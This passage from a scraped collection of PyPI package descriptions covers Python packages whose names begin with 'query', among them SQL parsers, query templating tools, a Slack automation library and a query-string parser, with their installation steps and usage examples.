(CIViC) KnowledgebaseAdded possibility to query bgzipped filesFixedDependenciesDeprecated0.1.3 - Diamond Neptune (2022-11-21)AddedFixedFix including moduleDependenciesDeprecated0.1.2 - Diamond Neptune (2022-11-18)AddedFixedFix installing requirementsDependenciesDeprecated0.1.1 - Methane Titan (2022-11-18)AddedFixedGithub Actions publishing to PyPIFix docsDependenciesDeprecated0.1.0 - initial release (2022-11-18)AddedFirst release on PyPICreated the package template with cookiecutterFunctions to query the cancergenomeinterpreter REST APIFixedDependenciesDeprecated"} +{"package": "queryones", "pacakge-description": "API ReferenceimportfromqueryonesimportQueryfromtablevalueimportManager,TableValueUsage1. simple query with paramsdata=(('oleg','Asbest',2,1),('ivan','Asbest',1,2),('nastya','Krasnodar',0,2),('Max','Asbest',1,2),('Even','Krasnodar',1,2),('Rob','Krasnodar',1,2),('Mob','Ekaterinburg',1,2),('Dick','Ekaterinburg',1,2),('Cheize','Krasnodar',1,2),('Longard','Ekaterinburg',1,2),)manager=Manager()table1=TableValue(manager=manager,table_name='first_table')table1.columns.add('name')table1.columns.add('city')table1.columns.add('children_count',TableValue.Types.INTEGER)table1.columns.add('pets_count',TableValue.Types.INTEGER)table1.new_bulk_insert(data)query=Query(manager=manager)query.text='''select'Amigo' as name,&city as city,&children_count as children_count,&pets_count as pets_count'''query.set_parameter('city','London')query.set_parameter('children_count',3)query.set_parameter('pets_count',0)result=query.execute()print(result.get_data())Output[('Amigo', 'London', 3, 0)]2. multi queryquery.text='''select'Amigo' as name,&city as city,&children_count as children_count,&pets_count as pets_count;select'chili' as come_hot'''result=query.execute()print(result.get_data())Output[('chili',)]3. 
multi query with multi resultquery.text='''select'Amigo' as name,&city as city,&children_count as children_count,&pets_count as pets_count;select'chili' as some_hot'''result=query.execute_pack()print(len(result))print(result[0].get_data())print(result[1].get_data())Output2[('Amigo', 'London', 3, 0)][('chili',)]4. Using TableValue object in queryquery.text='''selecttable1.name as name,table1.city as cityinto tmp_doublefrom &table1 as table1;selecttable1.name,table1.cityfrom tmp_double as table1union allselectname,cityfrom first_table'''query.set_parameter('table1',table1)# table1 - TableValue objectresult=query.execute()foriinresult.get_data(sort='name'):print(i)Output('Cheize', 'Krasnodar')\n('Cheize', 'Krasnodar')\n('Dick', 'Ekaterinburg')\n('Dick', 'Ekaterinburg')\n('Even', 'Krasnodar')\n('Even', 'Krasnodar')\n('Longard', 'Ekaterinburg')\n('Longard', 'Ekaterinburg')\n('Max', 'Asbest')\n('Max', 'Asbest')\n('Mob', 'Ekaterinburg')\n('Mob', 'Ekaterinburg')\n('Rob', 'Krasnodar')\n('Rob', 'Krasnodar')\n('ivan', 'Asbest')\n('ivan', 'Asbest')\n('nastya', 'Krasnodar')\n('nastya', 'Krasnodar')\n('oleg', 'Asbest')\n('oleg', 'Asbest')5. manager tablesprint(manager.tables.keys())print('===deleting===')print(manager.exists('first_table'))manager.drop_table('first_table')print(manager.exists('first_table'))print('===deleting not exist table===')print(manager.exists('test_table'))manager.drop_table('test_table')Outputdict_keys(['first_table', 'ResultTable0', 'ResultTable1', 'ResultTable2', 'ResultTable3', 'ResultTable4'])\n\n===deleting===\nTrue\nFalse\n\n===deleting not exist table===\nFalse\nNameError: Table [test_table] is not exists.6. Connect to earlier created tablemanager=Manager(os.getcwd()+os.sep+'data.db')ifnotmanager.exists('first_table'):table1=TableValue(manager=manager,table_name='first_table')table1.columns.add('name')table1.columns.add('city')table1.columns.add('children_count',TableValue.Types.INTEGER)table1.columns.add('pets_count',TableValue.Types.INTEGER)table1.new_bulk_insert(data)else:table1=manager.get('first_table')row1=table1.get_rows(limit=1)[0]print(row1)Output[id:1], [name:oleg], [city:Asbest], [children_count:2], [pets_count:1]"} +{"package": "query-package-documentation", "pacakge-description": "Query Package DocumentationInstallation:PyPIDocumentation:Read the Docs"} +{"package": "queryparams-liberdade", "pacakge-description": "Parse query parameters as objects to be used in Python"} +{"package": "query-parser", "pacakge-description": "qs-parserInstallFor use this lib with poetry :poetryaddquery-parserFor use this lib with pip :pipinstallquery-parserUsagefromquery_parser.parserimportparse_query_stringprint(parse_query_string(\"a=1&b=2&c=3&b[]=4&b[]=5&b[other]=6\"))# {'a': '1', 'b': {'0': '2', '1': '4', '2': '5', 'other': '6'}, 'c': '3'}"} +{"package": "queryparser-python2", "pacakge-description": "Tool for parsing and processing MySQL and ADQL SELECT queriesDesigned to be used in conjunction withdjango-daiqurias a query processing backend but it can be easily used as a stand-alone tool\nor integrated into another project.InstallationThe easiest way to install the package is by using the pip tool:pipinstallqueryparser-python3or if you are using an older version (2.7) of pythonpipinstallqueryparser-python2Alternatively, you can clone the repository and install it from there.\nHowever, this step also requires generating the parser which is a slighly\nmore elaborate process (see below).Generating the parser from the git repositoryTo generate the parsers you needpython(either 2 
or 3),javaabove version\n7, andantlr4(antlr-4.*-complete.jarhas to be installed inside the/usr/local/lib/or/usr/local/bin/directories).After cloning the project runmakeand alibdirectory will be created with the complete source for python2\nand python3. After that runpythonsetup.pyinstallto install the generated parser in your virtual environment.Parsing MySQLParsing and processing of MySQL queries can be done by creating an instance\nof theMySQLQueryProcessorclassfromqueryparser.mysqlimportMySQLQueryProcessorqp=MySQLQueryProcessor()feeding it a MySQL querysql=\"SELECT a FROM db.tab;\"qp.set_query(sql)and running it withqp.process_query()After the processing, the processor objectqpwill include tables, columns,\nfunctions, and keywords used in the query or will raise aQuerySyntaxErrorif there are any syntax errors in the query.Alternatively, passing the query at initialization automatically processes it.Translating ADQLTranslation of ADQL queries is done similarly by first creating an instance of\ntheADQLQueryTranslatorclassfromqueryparser.adqlimportADQLQueryTranslatoradql=\"SELECT TOP 100 POINT('ICRS', ra, de) FROM db.tab;\"adt=ADQLQueryTranslator(adql)and callingadt.to_mysql()which returns a translated string representing a valid MySQL query if\nthe ADQL query had no errors. The MySQL query can then be parsed with theMySQLQueryProcessorin the same way as shown above.TestingFirst, installpytestpipinstallpytestthen run the test suite for a version of python you would like to test withpytestlib/python2pytestlib/python3"} +{"package": "queryparser-python3", "pacakge-description": "queryparserTool for parsing and processing of MySQL/PostgreSQL and translation of\nADQL SELECT-like queriesDesigned to be used in conjunction withdjango-daiqurias a query processing backend but it can be easily used as a stand-alone tool\nor integrated into another project.InstallationThe easiest way to install the package is by using the pip tool:pipinstallqueryparser-python3Alternatively, you can clone the repository and install it from there.\nHowever, this step also requires generating the parser which is a slightly\nmore elaborate process (see below).Generating the parser from the git repositoryTo generate the parsers you needpython3,javaabove version\n7, andantlr4(antlr-4.*-complete.jarhas to be installed inside the/usr/local/lib/or/usr/local/bin/directories).After cloning the project runmakeand alibdirectory will be created. 
After that, runpythonsetup.pyinstallto install the generated parser in your virtual environment.Parsing MySQL and PostgreSQLParsing and processing of MySQL queries can be done by creating an instance\nof theMySQLQueryProcessorclassfromqueryparser.mysqlimportMySQLQueryProcessorqp=MySQLQueryProcessor()feeding it a MySQL querysql=\"SELECT a FROM db.tab;\"qp.set_query(sql)and running it withqp.process_query()After the processing is completed, the processor objectqpwill include\ntables, columns, functions, and keywords used in the query or will raise aQuerySyntaxErrorif there are any syntax errors in the query.Alternatively, passing the query at initialization automatically processes it.PostgreSQL parsing is very similar to MySQL, except it requires importing\nthePostgreSQLProcessorclass:fromqueryparser.postgresqlimportPostgreSQLQueryProcessorqp=PostgreSQLQueryProcessor()The rest of the functionality remains the same.Translating ADQLTranslation of ADQL queries is done similarly by first creating an instance of\ntheADQLQueryTranslatorclassfromqueryparser.adqlimportADQLQueryTranslatoradql=\"SELECT TOP 100 POINT('ICRS', ra, de) FROM db.tab;\"adt=ADQLQueryTranslator(adql)and callingadt.to_mysql()which returns a translated string representing a valid MySQL query if\nthe ADQL query had no errors. The MySQL query can then be parsed with theMySQLQueryProcessorin the same way as shown above.TestingFirst, installpytestpipinstallpytestthen run the test suite for a version of python you would like to test withpytestlib/More elaborate testing procedures can be found in the development notes."} +{"package": "query-phenomizer", "pacakge-description": "query_phenomizerA small module for querying thephenomizer toolwith HPO-terms.INFO!!!From 16/2-16 phenomizer demands a password and username when using the service in this way.\nRequest login credentials fromsebastian.koehler@charite.deInstallationpip install query_phenomizerorgit clone https://github.com/moonso/query_phenomizer.git\ncd query_phenomizer\npip install --editable .##Usage##query_phenomizer HP:0001623 HP:0002465 --output phenitypes.txtUser can check if hpo terms exist by using the flag-c/--check_terms.query_phenomizer HP:0001623 HP:02345555 --check_terms -vPrints that HP:02345555 does not exist.For more info runquery_phenomizer --help"} +{"package": "querypool", "pacakge-description": "querypoolExecution pool with caching and early return for python.Query pools let a query run in the background when it doesn't return\nwithin a given timeout. In that case the result of the previous query\nis returned or raised. 
If there is no result, the default value is returned.import requests\nfrom querypool.pools import CooperativeQueryPool\n\npool = CooperativeQueryPool(timeout=0.001)\nurl = \"https://jsonplaceholder.typicode.com/photos\"\n\n# Returns None because the query times out.\nresponse = pool.execute(requests.get, args=(url,), default=None)\nassert response is None\n\n# Increase the timeout to let the query finish.\n# The same function with the same arguments is still running so\n# all this does is wait for the result of the previous call.\nresponse = pool.execute(requests.get, args=(url,), default=None, timeout=3)\nresponse.raise_for_status()\n\n# Returns the previous result because the query times out.\nresponse = pool.execute(requests.get, args=(url,), default=None)\nresponse.raise_for_status()Documentationhttps://querypool.readthedocs.io/"} +{"package": "query-postgresql", "pacakge-description": "No description available on PyPI."} +{"package": "querypp", "pacakge-description": "queryppDeprecation Noticequerypp has been deprecated in favor of vanilla jinja2. After porting it to jinja2, I realized that none of querypp\nwas actually necessary.Migrating docs here.v0.0.3is the last version that doesn't use jinja2, in case\nyou want a more lightweight version.querypp is a SQL query[1] templating system based onjinja2.[1]: Although it is trivially adapted to other languages, as the only SQL-specific assumption is the line comment\nsyntax.Take an example:-- :query users\nSELECT *\nFROM users\n-- :qblock profiles\n\tLEFT JOIN profiles USING (user_id)\n\t-- :block login_history\n\t\tLEFT JOIN login_history USING (profile_id)\n\t-- :endqblock\n-- :endqblock\n-- :qblock user_id WHERE user_id = $1\n-- :endqueryA Query template can be called:with no block names to return the query without any blockswith one or more block names to return the query with only those block names.In this case,q('profiles', 'user_id')would return the query with thelogin_historyJOIN removed.Additionally, anyjinja2 templating features,\nsuch as variables and macro functions, can be used, using either the line syntax (e.g.-- :include 'foo.sql')\nor the block syntax (e.g.{% if x == 1 %}).Usageenv = querypp.QueryEnvironment('sql/')\nqueries = env.get_template('queries.sql') # opens sql/queries.sql\ndb.execute(queries.users('login_history', 'user_id'), user_id)MotivationAfter moving all my SQL queries to separate files,\nI noticed that I was duplicating some of them except for one extra clause.\nI created this to allow me to deduplicate such queries.LicensePublic domain, seeCOPYING"} +{"package": "query-prom", "pacakge-description": "QueryPrometheusThis is a simple library to ease querying prometheus in python.Getting StartedTo get up and running, you can either clone the repo and go from there. Or it should be pip installable.git clone git@github.com:jpavlav/QueryPrometheus.git\ncd QueryPrometheus\npip install -r requirements.txtThe advantage to a pip install is the required packages are included.pip install git+https://github.com/jpavlav/QueryPrometheus.gitPrerequisitesPython3Built WithPython3- Beautiful language.AuthorsJustin Palmer-Urrverything-MeAcknowledgmentsKenneth Reitz ->setup- Thanks!Kamori ->Cool Guy- Thanks to you as well!"} +{"package": "query-prometheus", "pacakge-description": "Failed to fetch description. 
HTTP Status Code: 404"} +{"package": "query-pts", "pacakge-description": "Query_ptsA package for calculate barycentric coordinates in the tetrahedras.DependencyThis package relies oncuda 10, which has been tested onpytorch 1.7.1andcuda 10.2.Usageimport torch\nimport query_pts\ntet_idx, barycentric = query_pts.cal_barycentric(q_pts, verts, tets, indexes, 4)\nArgs:\n q_pts (torch.tensor): the query points, [Nq,3]\n verts (torch.tensor): the vertices tethedra, [NV,3]\n tets (torch.tensor): the vertex index of each tet, [NT,4]\n K (int): the nearest neighbors for searching to accelerate query\n use_cuda (bool, optional): _description_. Defaults to True.\nReturn:\n tet_idx (torch.tensor): the tet which containing the query point, [Nq,]\n barycentric (torch.tensor): corresponding barycentric coordinates, [Nq,4]If a point is not in any tetrahedras, the tet idx is set to-1and barycentric coordinates are set to[0,0,0,0]."} +{"package": "query_quiver", "pacakge-description": "QueryQuiverQueryQuiver estimates your interests based on your past Google Chrome search history and suggests technical article ideas that you might be comfortable writing about.Installpipinstallgit+https://github.com/marutaku/QueryQuiverUsagePlease close Google Chrome before using this tool.The tool references the SQLite database used internally by Google Chrome.While using GoogleChrome, this SQLite database will be locked and an error will occur.queryquivergenerateOptionsqueryquivergenerate--help\n\nNAMEqueryquivergenerate-GenerateideaoftecharticlesfromGoogleChromehistorySYNOPSISqueryquivergenerate\n\nDESCRIPTIONGenerateideaoftecharticlesfromGoogleChromehistoryFLAGS-q,--query_history_limit=QUERY_HISTORY_LIMITType:intDefault:20-n,--number_of_ideas=NUMBER_OF_IDEASType:intDefault:5-c,--chrome_history_path=CHROME_HISTORY_PATHType:Optional[str|None]Default:None-o,--openai_api_key=OPENAI_API_KEYType:Optional[str|None]Default:None-d,--debug=DEBUGType:boolDefault:False-l,--language=LANGUAGEType:strDefault:'en'-u,--use_gpt4=USE_GPT4Type:boolDefault:FalseDeveloper informationsetupmakesetuptestmaketestlintmakelintformatmakeformat"} +{"package": "query_reports", "pacakge-description": "Query Reports creates reports based on the django queryset object.## Using the pretty bootstrap templateIf you want to use a pretty bootstrap template instead of the normal sitebase.htmlyou can overridequery_reports/base.htmland just put this in the file{% extends \u201cquery_reports/bootstrap_base.html\u201d %}## Running the TestsYou can run the tests with viapython setup.py testorpython run_tests.py"} +{"package": "query-rewritor", "pacakge-description": "Failed to fetch description. 
HTTP Status Code: 404"} +{"package": "queryrunner", "pacakge-description": "Query-RunnerCLI tool to help with running queries.QuickstartPass through asqlalchemy DB URLand a query to run a query and export to file.\n(You may need the relevant DB drivers installed also.)python-mqueryrunnershow\"sqlite:///\"\"SELECT 'Val' as col1\"python-mqueryrunnerto-csv\"sqlite:///\"\"SELECT 'Val' as col1\"\"output.csv\"You can also use an environment variable to contain your connection string, and a file to contain your SQL query.DB_URI=\"sqlite:///\"#example-query.sqlSELECT'Val'ascol1python-mqueryrunnerto-csv\"DB_URI\"\"example-query.sql\"\"output.csv\"Query ParametersYou can pass query parameters as extra CLI options, but this only works for strings.So this will work:python-mqueryrunnershow\"sqlite:///\"\"SELECT '5' as col1 WHERE col1=:val\"--val5python-mqueryrunnershow\"sqlite:///\"\"SELECT 5 as col1 WHERE CAST(col1 as text)=:val\"--val5But this will not:python-mqueryrunnershow\"sqlite:///\"\"SELECT 5 as col1 WHERE col1=:val\"--val5"} +{"package": "queryS3", "pacakge-description": "queryS3 APIIntroductionThis API enable users to query images from AI Testing database, currently implementing on AWS S3, with natural English description. A string of keywords also works if users want to put more restrictions onto the picture. The main functionality of this API can be treated in a blackbox manner. That it takes is a string of description and returns a list of S3 object URL of the images.Dependencies- nltk: Natural Language Toolkitgithub link- pandas: powerful Python data analysis toolkitgithub linkInstallationpipinstallqueryS3Example usagefromqueryS3importQS3qs=QS3.QS3()# this line will retrieve all images that have single husky# the return type will be a python listqs.query('single husky')API detailsQS.query(in_q: str): -> List[str]: \"query\" is a function in the class QS. It takes a english description(or a string of keywords needed) as input and returns a list of S3 object URL stringsQS.set_label_list(self, label_list: List[str]): This function will replace the original label list in the database with a new list of labels only for this object instance of QS. By doing so, the whole \"extract label from description\" and \"label matching search\" process will then based on the new set of labels. Duplicated labels will be removed.QS.add_label_list(self, label_list: List[str]): This function will append the label list with the newly added list. Duplicated labels will be removed.AuthorQiao Liu,Everette LiCopyrightCopyright \u00a9 2020, The AITestResourceLibrary Authority. Released under the MIT License."} +{"package": "querySDSS", "pacakge-description": "QuerySDSS is a Python script that utilizes the Astropy and Astroquery\nlibraries to retrieve data from the Sloan Digital Sky Survey (SDSS) Data\nRelease 18 (DR18). 
This script fetches information about celestial\nobjects including their nature (galaxy, star, quasar), redshift,\ncoordinates, positions, and flux values.RequirementsPython 3.xAstroqueryAstropyYou can install the required packages using the following command:pipinstallastroqueryastropyHow to InstallClone this repository to your local machine using the following command:gitclonehttps://github.com/aCosmicDebbuger/querySDSS.gitcdquerySDSSor you can use pippipinstallquerySDSSUsage:Just opena a terminal where the file is located and runpython3querySDSS.pyor if you need to import it:fromquerySDSS.querySDSS.querySDSSimportquery_sdss_dataa=query_sdss_data(num_observations=3000)print(a)You\u2019ll get a table of SDSS data."} +{"package": "query-segmenter", "pacakge-description": "query-segmenterQuery Segmentation for search"} +{"package": "query-selector", "pacakge-description": "Query selector allows one treat a file full of SQL queries as a record, with\none attribute for each annotated query. This makes working with long, ad-hoc\nSQL queries more hygienic, and has the benefit of making it easy to find the\nqueries.TheQuerySelectorconstructor accepts a string, file handle or(, . Theis any Python compatible name; it will\nbecome an attribute of the object. Theis merely metadata, and can\nbe omitted; it describes whether a query should have one, none or many\nresults.For example, a file like this:--@ t oneSELECTnow();becomes an object with a single attributet:>>>q.tQuery(args=[], mode=u'one', readonly=False, text=u'SELECT * FROM now();')AQuerySelectorobject is iterable, providing pairs of name and query in\nthe order that the queries originally appeared in the file.>>>forname,qinqs:...print'%s:%s'%(name,q)t: Query(args=[], mode=u'one', readonly=True, text='SELECT now();')The Query ConventionIf you have a scripttask.pyand a SQL filetask.sql, or a module in a\npackagepackage/module.pyand a SQL filepackage/module.sql, QuerySelector\nhas a shortcut for you:fromquery_selector.magicimportqueriesforqinqueries:printqThemagicmodule overrides the normal module loading machinery to\ndetermine which script or module is importing it and locate an adjacent SQL\nfile. This magic is in a separate module to make it stricly opt-in!ModesModes can be one ofnone,one,one?andmany. When not\nspecified, default ismany. A mode string can also be followed with the\nsingle wordroas a clue that the query is read-only.Realistically,SELECT now()is a read-only query. We can annotate it as\nsuch, the resulting query datastructure records this:>>>QuerySelector(\"\"\"...--@ t one ro...SELECT now();...\"\"\").tQuery(args=[], mode=u'one', readonly=True, text=u'SELECT * FROM now();')Parametersquery-selectorrecognizes the%(...)sstyle parameter references\ndefined in Python DBI 2.0. Say that we\u2019d like to pass a timezone\nwhen selecting the server time. We can do so by addingAT TIME ZONE %(tz)sto our query. The presence of this parameter is stored in theargsfield\nof the parsed result. (The parameters in.argsare listed in the order of\ntheir first appearance in the query.)>>>QuerySelector(\"\"\"...--@ t one ro...SELECT now() AT TIME ZONE%(tz)sAS t;...\"\"\").tQuery(args=[u'tz'], mode=u'one', readonly=True,\n text=u'SELECT now() AT TIME ZONE %(tz)s AS t;')"} +{"package": "queryset-annotations", "pacakge-description": "django_queryset_annotationsThedjango_queryset_annotationslibrary provides a way to add annotations to Django querysets. Annotations are additional fields that are calculated on the fly and added to the queryset results. 
This can be particularly useful when you want to add computed fields to your models without having to modify the underlying database schema.InstallationYou can installdjango_queryset_annotationsvia pip:pipinstallqueryset-annotationsUsageTo use thedjango_queryset_annotationslibrary, you first need to create an annotation class. An annotation class is a subclass of theBaseAnnotationclass. TheBaseAnnotationclass provides a number of methods that you can use to define the annotation, such as thename,output_field, andget_expression()methods.ExampleConsider the following models:fromdjango.dbimportmodelsclassBook(models.Model):title=models.CharField(max_length=100)author=models.ForeignKey(\"Author\",on_delete=models.CASCADE,related_name=\"books\")classAuthor(models.Model):name=models.CharField(max_length=100)age=models.IntegerField()You can create an annotation class to count the number of books for each author:fromdjango.dbimportmodelsfromqueryset_annotations.baseimportBaseAnnotationclassBookCountAnnotation(BaseAnnotation):name=\"book_count\"output_field=models.IntegerField()defget_expression(self):returnmodels.Count(\"books\",distinct=True)Then, create a proxy model for theAuthormodel:fromqueryset_annotations.proxy.modelimportBaseProxyModelclassAuthorProxyModel(BaseProxyModel):book_count=BookCountAnnotation()classMeta:model=AuthorYou can now use this proxy model in your serializers and viewsets:fromrest_frameworkimportserializersfromrest_framework.viewsetsimportModelViewSetclassAuthorSerializer(serializers.ModelSerializer):classMeta:model=AuthorProxyModelfields=\"__all__\"classBookSerializer(serializers.ModelSerializer):classMeta:model=Bookfields=\"__all__\"classAuthorViewSet(ModelViewSet):queryset=AuthorProxyModel.objects.all()serializer_class=AuthorSerializerclassBookViewSet(ModelViewSet):queryset=Book.objects.all()serializer_class=BookSerializerWith this setup, when you retrieve an author from the API, you will also get the count of books they have written.Advanced UsageThedjango_queryset_annotationslibrary also provides aBaseContextManagerand anAnnotatedQuerysetMixinfor more advanced use cases. 
TheBaseContextManagercan be used to manage the context of the annotation, and theAnnotatedQuerysetMixincan be used to automatically annotate the queryset in a viewset.Here is an example of how to use these features:fromdjango.dbimportmodelsfromrest_frameworkimportserializersfromrest_framework.viewsetsimportModelViewSetfromannotation.modelsimportAuthor,Bookfromqueryset_annotations.baseimportBaseAnnotation,BaseContextManagerfromqueryset_annotations.drf.viewsimportAnnotatedQuerysetMixinfromqueryset_annotations.proxy.modelimportBaseProxyModelclassBookCountAnnotation(BaseAnnotation):name=\"book_count\"output_field=models.IntegerField()defget_expression(self,*,context_manager:BaseContextManager=None):returnmodels.Count(\"books\",distinct=True)classAuthorProxyModel(BaseProxyModel):book_count=BookCountAnnotation()classMeta:model=AuthorclassAuthorSerializer(serializers.ModelSerializer):user=serializers.HiddenField(default=serializers.CurrentUserDefault())classMeta:model=AuthorProxyModelfields=\"__all__\"classBookSerializer(serializers.ModelSerializer):classMeta:model=Bookfields=\"__all__\"classAuthorViewSet(AnnotatedQuerysetMixin,ModelViewSet):annotation_context_class=BaseContextManagerannotated_model=AuthorProxyModelserializer_class=AuthorSerializerdefget_queryset(self):context_manager=self.annotation_context_class(self.get_serializer_context())returnself.queryset.get_annotated_queryset(context_manager=context_manager)classBookViewSet(ModelViewSet):queryset=Book.objects.all()serializer_class=BookSerializerIn this example, theAuthorViewSetuses theAnnotatedQuerysetMixinand aBaseContextManagerto automatically annotate the queryset with the book count.ConclusionThedjango_queryset_annotationslibrary provides a powerful and flexible way to add computed fields to your Django models. 
Whether you need to add simple counts or more complex calculations, this library can help you keep your code clean and maintainable."} +{"package": "queryset-reporter", "pacakge-description": "Django Queryset ReporterDescriptionA django pluggable admin-site app for create persisted queryset's and make reports based on them, in various forms of data like cvs's, xlsx's.Project URL:https://github.com/ricardodani/django-queryset-reporter/InstallType:pipinstallqueryset_reporterIn yoursettingsadd:INSTALLED_APPS=[# ...'queryset_reporter',]Migrate `queryset_reporter`` models:./manage.pymigrateAdd url's definitions to yourproject.urlsmodule:path('path-of-choice/',include('queryset_reporter.urls')),PermissionsYou should addqueryset_reporter.can_use_reportsto regular users that you want to access the report view/creation page.Example project credentialsIn order to test the project, there's a Example project with a pre defined database that you can use right away.\nHere's the credentials:Admin user:User: admin - Pass: 123Common user:User: tester - Pass: asdfghjkl\u00e7Tested ondjango == 2.2.xpython == 3.7.xAboutAuthor: Ricardo DaniE-mail:ricardodani@gmail.comGithub: github.com/ricardodaniLicenseMIT"} +{"package": "queryset-serializer", "pacakge-description": "QuerysetSerializerThis package adds a serializer to ensure all models in the serializers get properly prefetched or selectedinstallationpip install queryset-serializerUsageSimply install the package into your project and import the serializerfromqueryset_serializerimportQuerySetSerializerclassMyModelSerializer(QuerySetSerializer):...classMeta:...In order to prefetch/select everything make sure all serializers used are of QuerySetSerializerNote : You cannot mixrestframework.serializer.ModelSerializerwith this class\n(However all instance of ModelSerializer should be replaceable)Configconfigurations can be changed as following:fromqueryset_serializer.serializersimportConfigConfig.meta_class.{setting}={new_value}these are the relevant settings :prefetch_to_attr_prefix , What string will be used as prefix.prefetch_listing , How the prefetch is done (Options: PrefetchToAttrSerializerList, PrefetchSerializerList)prefetch_listingthere are 2 options for the prefetch_listing. (Located inqueryset_serializer.serializers.model)PrefetchToAttrSerializerListwill prefetch/select relations and use theto_attrattribute of thePrefetchclassPrefetchSerializerListwill only prefetch/select relationsThis package by default makes use PrefetchToAttrSerializerList,\nThe benefit of this is that the.all()calls on the relations are nog longer lazy.This can significantly speed up performance especially on a queryset with a large amount of results or\nif there are a lot of child (queryset)serializerThis can also be turned off, and instead do a regular prefetch:fromqueryset_serializer.serializersimportConfigfromqueryset_serializer.serializers.modelimportPrefetchSerializerListConfig.meta_class.prefetch_listing=PrefetchSerializerList"} +{"package": "querysource", "pacakge-description": "QuerySourceQuerySource is a powerful Python library designed to streamline access to multiple databases and external APIs through a single, unified interface. 
Utilizing the proxy design pattern, QuerySource allows developers to seamlessly integrate various data sources into their projects without worrying about the complexities of managing multiple connections.FeaturesUnified interface for querying multiple databases (Redis, PostgreSQL, MySQL, Oracle, SQL Server, InfluxDB, CouchDB, Druid)Support for external APIs (Salesforce, ShopperTrack, ZipCodeAPI, etc.)Easy-to-use API for executing queriesExtensible design, allowing for easy addition of new data sourcesInstallation$pipinstallquerysource---> 100%Successfully installed querysourceRequirementsPython >= 3.9asyncio (https://pypi.python.org/pypi/asyncio/)Basic UsageQuerySource can be used in several ways, one is using QS object itself:fromquerysource.queries.qsimportQSquery=QS(query='SELECT * FROM tests',output_format='pandas')result,error=awaitquery.query()Extending QuerySourceTo add support for a new data source, create a new class inheriting from the BaseProvider or BaseAPI class and implement the required methods (prepare_connection, query, close). Then, register the new data source in the QuerySource class by adding it to the appropriate dictionary (_supported_databases or _supported_apis).ContributingWe welcome contributions to QuerySource! If you'd like to contribute, please follow these steps:Fork the repositoryCreate a new branch for your feature or bugfixImplement your changesAdd tests covering your changesCreate a pull request against the original repositoryContribution guidelinesWriting testsCode reviewOther guidelinesLicenseQuerySource is released under the BSD License. See the LICENSE file for more details."} +{"package": "querystar", "pacakge-description": "\ud83d\udc4b Hi there, this isQueryStarPython-First Solution to Develop BotsQueryStar lets you easily set up triggers and actions to automate workflows.Something likeSaving Slack new messages that must contain 'hello' to a Google sheetcan be easily done:# bot.pyimportquerystarasqsdata=qs.triggers.slack.new_message(channel_id='MyChannelID',trigger_string='hello')qs.actions.slack.new_message(spreadsheet_id='MySheetID',worksheet_id='Sheet1',data=[[data['user'],data['text']]])QueryStar can help you:automate workflowsdevelop Slack botsintegrate SaaS data to your own appsrun background jobsschedule tasks...Get StartedInstallationpip install querystarSetup Slack (or other apps) ConnectionThis step takes 3-5 mins:Crete a free account atquerystar.ioAdd any SaaS tools that you want to automate in your QueryStar workspace. (Head over toquickstartin our docs for instructions.)Get a QueryStar token. (Instruction)Add the token as an environment variable on your dev machine.[!IMPORTANT]\nYour Data is Safe on QueryStar backend:\nQueryStar takes care of 3rd party API integration. It only monitors trigger events and passes action data back to the apps of your choice. Your data isNOTstored or logged in any form or capacity. 
Please seePrivacy Policyfor more details.Build and Run a BotCreate a new fileapp.pyand add this code:# app.pyimportquerystarasqsmessage=qs.triggers.slack.new_message(channel_id='MyChannelID')print(message)Add QueryStar app to your Slack channel, and copy the channel ID (Instruction)ReplaceMyChannelIDwith the channel id.Run the bot:$querystarrunapp.pyGet InspiredBecause you use Python, there's much more you can build.A LLM-powered (Large Language Model) Slack bot:tutorial."} +{"package": "querystream", "pacakge-description": "UNKNOWN"} +{"package": "querystring", "pacakge-description": "This repo is a port of thenode.js querystring module.It contains two methods,parse_qsandstringify_objthat are functionally equivalent to thequerystring.parseandquerystring.stringifynode counterparts. It also contains defaultencode_uri_componentanddecode_uri_componentfunctions that can be used for convenience.Installationpip install querystringUsageParsing a query string>>> querystring.parse_qs('foo=bar&baz=qux&baz=quux&corge=')\n{u'foo': u'bar', u'baz': [u'qux', u'quux'], u'corge': u''}>>> querystring.parse_qs('foo:bar;baz:qux;baz:quux;corge:', sep=';', eq=':')\n{u'foo': u'bar', u'baz': [u'qux', u'quux'], u'corge': u''}>>> def gbk_decode(s):\n... return urllib.unquote(s)\n...\n>>> querystring.parse_qs('foo=bar&w=%D6%D0%CE%C4', decode_fn=gbk_decode)\n{'foo': 'bar', 'w': '\\xd6\\xd0\\xce\\xc4'} # u'\u4e2d\u6587'Converting an object back into a query string>>> querystring.stringify_obj({'foo': 'bar', 'baz': ['qux', 'quux'], 'corge': ''})\n'foo=bar&baz=qux&baz=quux&corge='>>> querystring.stringify_obj({'foo': 'bar', 'baz': ['qux', 'quux'], 'corge': ''}, sep=';', eq=':')\n'foo:bar;baz:qux;baz:quux;corge:'>>> def gbk_encode(s):\n... return urllib.quote(unicode(s).encode('gbk'))\n...\n>>> querystring.stringify_obj({'foo': 'bar', 'w': u'\u4e2d\u6587'}, encode_fn=gbk_encode)\n'foo=bar&w=%D6%D0%CE%C4'MotivationWe were looking for a simple module to parse query parameters in a sensible way,\nand were unsatisfied by howurlparsehandled params (putting all values in a list),\nso we made this.LicenseCopyright Refinery29, Inc.Permission is hereby granted, free of charge, to any person obtaining a\ncopy of this software and associated documentation files (the\n\u201cSoftware\u201d), to deal in the Software without restriction, including\nwithout limitation the rights to use, copy, modify, merge, publish,\ndistribute, sublicense, and/or sell copies of the Software, and to permit\npersons to whom the Software is furnished to do so, subject to the\nfollowing conditions:The above copyright notice and this permission notice shall be included\nin all copies or substantial portions of the Software.THE SOFTWARE IS PROVIDED \u201cAS IS\u201d, WITHOUT WARRANTY OF ANY KIND, EXPRESS\nOR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF\nMERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
